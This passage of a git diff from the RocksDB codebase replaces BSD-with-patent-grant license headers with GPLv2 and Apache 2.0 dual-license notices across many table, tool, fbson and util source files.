b/table/plain_table_index.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/table/plain_table_key_coding.cc b/table/plain_table_key_coding.cc index 89b70022812..3e87c03d13f 100644 --- a/table/plain_table_key_coding.cc +++ b/table/plain_table_key_coding.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include "table/plain_table_key_coding.h" diff --git a/table/plain_table_key_coding.h b/table/plain_table_key_coding.h index a23f782cd0d..321e0aed594 100644 --- a/table/plain_table_key_coding.h +++ b/table/plain_table_key_coding.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/table/scoped_arena_iterator.h b/table/scoped_arena_iterator.h index d6183b0c084..1de570dc7f2 100644 --- a/table/scoped_arena_iterator.h +++ b/table/scoped_arena_iterator.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. See the AUTHORS file for names of contributors. diff --git a/table/sst_file_writer.cc b/table/sst_file_writer.cc index 5d7a46c606c..adcd91f92ea 100644 --- a/table/sst_file_writer.cc +++ b/table/sst_file_writer.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/sst_file_writer.h" diff --git a/table/sst_file_writer_collectors.h b/table/sst_file_writer_collectors.h index 77ca1c81882..ce3a45f5a74 100644 --- a/table/sst_file_writer_collectors.h +++ b/table/sst_file_writer_collectors.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #include diff --git a/table/table_builder.h b/table/table_builder.h index 4e413b41110..ef2e608ed46 100644 --- a/table/table_builder.h +++ b/table/table_builder.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/table_properties.cc b/table/table_properties.cc index f3373ba539d..ef77ae566aa 100644 --- a/table/table_properties.cc +++ b/table/table_properties.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include "rocksdb/table_properties.h" #include "port/port.h" diff --git a/table/table_properties_internal.h b/table/table_properties_internal.h index 65b092fcebf..2a89427341b 100644 --- a/table/table_properties_internal.h +++ b/table/table_properties_internal.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/table/table_reader.h b/table/table_reader.h index 1ffe6667ce9..5f47468e6de 100644 --- a/table/table_reader.h +++ b/table/table_reader.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/table_reader_bench.cc b/table/table_reader_bench.cc index ff2ce43faee..85e48c1fea7 100644 --- a/table/table_reader_bench.cc +++ b/table/table_reader_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef GFLAGS #include diff --git a/table/table_test.cc b/table/table_test.cc index 1e91361d07f..c55eb425576 100644 --- a/table/table_test.cc +++ b/table/table_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/two_level_iterator.cc b/table/two_level_iterator.cc index d10e2d0e768..2236a2a726a 100644 --- a/table/two_level_iterator.cc +++ b/table/two_level_iterator.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/table/two_level_iterator.h b/table/two_level_iterator.h index 91d8fa83106..34b33c83f65 100644 --- a/table/two_level_iterator.h +++ b/table/two_level_iterator.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/third-party/fbson/FbsonDocument.h b/third-party/fbson/FbsonDocument.h index 9a00e247141..6fb8a93f171 100644 --- a/third-party/fbson/FbsonDocument.h +++ b/third-party/fbson/FbsonDocument.h @@ -1,12 +1,7 @@ -/* - * Copyright (c) 2011-present, Facebook, Inc. - * All rights reserved. - * - * This source code is licensed under the BSD-style license found in the - * LICENSE file in the root directory of this source tree. An additional grant - * of patent rights can be found in the PATENTS file in the same directory. - * - */ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /* * This header defines FbsonDocument, FbsonKeyValue, and various value classes diff --git a/third-party/fbson/FbsonJsonParser.h b/third-party/fbson/FbsonJsonParser.h index 678d970fb0b..63b03e2b908 100644 --- a/third-party/fbson/FbsonJsonParser.h +++ b/third-party/fbson/FbsonJsonParser.h @@ -1,12 +1,7 @@ -/* - * Copyright (c) 2011-present, Facebook, Inc. - * All rights reserved. - * - * This source code is licensed under the BSD-style license found in the - * LICENSE file in the root directory of this source tree. An additional grant - * of patent rights can be found in the PATENTS file in the same directory. - * - */ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /* * This file defines FbsonJsonParserT (template) and FbsonJsonParser. diff --git a/third-party/fbson/FbsonStream.h b/third-party/fbson/FbsonStream.h index 5f70221db50..12723ea30e2 100644 --- a/third-party/fbson/FbsonStream.h +++ b/third-party/fbson/FbsonStream.h @@ -1,12 +1,7 @@ -/* - * Copyright (c) 2011-present, Facebook, Inc. - * All rights reserved. - * - * This source code is licensed under the BSD-style license found in the - * LICENSE file in the root directory of this source tree. An additional grant - * of patent rights can be found in the PATENTS file in the same directory. - * - */ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /* * This header file defines FbsonInBuffer and FbsonOutStream classes. diff --git a/third-party/fbson/FbsonUtil.h b/third-party/fbson/FbsonUtil.h index 2c415476996..2b6d6f5c973 100644 --- a/third-party/fbson/FbsonUtil.h +++ b/third-party/fbson/FbsonUtil.h @@ -1,12 +1,7 @@ -/* - * Copyright (c) 2011-present, Facebook, Inc. - * All rights reserved. - * - * This source code is licensed under the BSD-style license found in the - * LICENSE file in the root directory of this source tree. An additional grant - * of patent rights can be found in the PATENTS file in the same directory. - * - */ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /* * This header file defines miscellaneous utility classes. diff --git a/third-party/fbson/FbsonWriter.h b/third-party/fbson/FbsonWriter.h index 4efaf817c27..a254e9bbf83 100644 --- a/third-party/fbson/FbsonWriter.h +++ b/third-party/fbson/FbsonWriter.h @@ -1,12 +1,7 @@ -/* - * Copyright (c) 2011-present, Facebook, Inc. - * All rights reserved. - * - * This source code is licensed under the BSD-style license found in the - * LICENSE file in the root directory of this source tree. An additional grant - * of patent rights can be found in the PATENTS file in the same directory. - * - */ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). /* * This file defines FbsonWriterT (template) and FbsonWriter. diff --git a/tools/blob_dump.cc b/tools/blob_dump.cc index 9b9e9130428..73601f2d80f 100644 --- a/tools/blob_dump.cc +++ b/tools/blob_dump.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #include diff --git a/tools/db_bench.cc b/tools/db_bench.cc index 3d51b73ce51..634bbba30ac 100644 --- a/tools/db_bench.cc +++ b/tools/db_bench.cc @@ -1,9 +1,7 @@ // Copyright (c) 2013-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/tools/db_bench_tool.cc b/tools/db_bench_tool.cc index f8237670ebe..0cc424eeab2 100644 --- a/tools/db_bench_tool.cc +++ b/tools/db_bench_tool.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/tools/db_bench_tool_test.cc b/tools/db_bench_tool_test.cc index e2d4a540a4a..145f329deae 100644 --- a/tools/db_bench_tool_test.cc +++ b/tools/db_bench_tool_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/tools/db_repl_stress.cc b/tools/db_repl_stress.cc index 0829bf58ac0..fac73c0668e 100644 --- a/tools/db_repl_stress.cc +++ b/tools/db_repl_stress.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE #ifndef GFLAGS diff --git a/tools/db_sanity_test.cc b/tools/db_sanity_test.cc index 18990ce824c..b40fe6134cb 100644 --- a/tools/db_sanity_test.cc +++ b/tools/db_sanity_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include #include diff --git a/tools/db_stress.cc b/tools/db_stress.cc index ef7273ee887..db905f0c887 100644 --- a/tools/db_stress.cc +++ b/tools/db_stress.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/tools/dump/db_dump_tool.cc b/tools/dump/db_dump_tool.cc index ea332e19e4e..8c5fa82e5b9 100644 --- a/tools/dump/db_dump_tool.cc +++ b/tools/dump/db_dump_tool.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #ifndef ROCKSDB_LITE diff --git a/tools/dump/rocksdb_dump.cc b/tools/dump/rocksdb_dump.cc index db06f6b326f..ddbfc2fb69f 100644 --- a/tools/dump/rocksdb_dump.cc +++ b/tools/dump/rocksdb_dump.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #if !(defined GFLAGS) || defined(ROCKSDB_LITE) diff --git a/tools/dump/rocksdb_undump.cc b/tools/dump/rocksdb_undump.cc index 1dd24e67efc..0d04ccaa681 100644 --- a/tools/dump/rocksdb_undump.cc +++ b/tools/dump/rocksdb_undump.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #if !(defined GFLAGS) || defined(ROCKSDB_LITE) diff --git a/tools/ldb.cc b/tools/ldb.cc index e7abc3efc09..6f70de6a6c7 100644 --- a/tools/ldb.cc +++ b/tools/ldb.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/tools/ldb_cmd.cc b/tools/ldb_cmd.cc index 597e9bc2110..2cd4d94d112 100644 --- a/tools/ldb_cmd.cc +++ b/tools/ldb_cmd.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE #include "rocksdb/utilities/ldb_cmd.h" diff --git a/tools/ldb_cmd_impl.h b/tools/ldb_cmd_impl.h index 375dbf685bb..91afd2674c2 100644 --- a/tools/ldb_cmd_impl.h +++ b/tools/ldb_cmd_impl.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once diff --git a/tools/ldb_cmd_test.cc b/tools/ldb_cmd_test.cc index 2d63e93e665..16f9631dad8 100644 --- a/tools/ldb_cmd_test.cc +++ b/tools/ldb_cmd_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/tools/ldb_tool.cc b/tools/ldb_tool.cc index 17ea76f7de6..e8229ef7b91 100644 --- a/tools/ldb_tool.cc +++ b/tools/ldb_tool.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE #include "rocksdb/ldb_tool.h" diff --git a/tools/reduce_levels_test.cc b/tools/reduce_levels_test.cc index 974e82bdbe6..7fe38bf7e8d 100644 --- a/tools/reduce_levels_test.cc +++ b/tools/reduce_levels_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/tools/sst_dump.cc b/tools/sst_dump.cc index a3f7186eb85..617d7581553 100644 --- a/tools/sst_dump.cc +++ b/tools/sst_dump.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/tools/sst_dump_test.cc b/tools/sst_dump_test.cc index c3697dc36c3..0a222afa33a 100644 --- a/tools/sst_dump_test.cc +++ b/tools/sst_dump_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2012 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/tools/sst_dump_tool.cc b/tools/sst_dump_tool.cc index 000167a777b..2a1729c7651 100644 --- a/tools/sst_dump_tool.cc +++ b/tools/sst_dump_tool.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // #ifndef ROCKSDB_LITE diff --git a/tools/sst_dump_tool_imp.h b/tools/sst_dump_tool_imp.h index 0511472508c..0129d98ebc7 100644 --- a/tools/sst_dump_tool_imp.h +++ b/tools/sst_dump_tool_imp.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #pragma once #ifndef ROCKSDB_LITE diff --git a/tools/write_stress.cc b/tools/write_stress.cc index 35bb6c208da..597e93798c6 100644 --- a/tools/write_stress.cc +++ b/tools/write_stress.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // // The goal of this tool is to be a simple stress test with focus on catching: diff --git a/util/aligned_buffer.h b/util/aligned_buffer.h index 0c2ec5059e2..e93f4b5c665 100644 --- a/util/aligned_buffer.h +++ b/util/aligned_buffer.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/allocator.h b/util/allocator.h index 3772a278ff1..505d6ba2bbf 100644 --- a/util/allocator.h +++ b/util/allocator.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/arena.cc b/util/arena.cc index b5ddf564aaf..6185b5c5585 100644 --- a/util/arena.cc +++ b/util/arena.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/arena.h b/util/arena.h index 94f81eeabb0..a2093517162 100644 --- a/util/arena.h +++ b/util/arena.h @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. -// This source code is also licensed under the GPLv2 license found in the -// COPYING file in the root directory of this source tree. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // Copyright (c) 2011 The LevelDB Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be diff --git a/util/arena_test.cc b/util/arena_test.cc index 10501ac7431..a033765adcb 100644 --- a/util/arena_test.cc +++ b/util/arena_test.cc @@ -1,9 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An 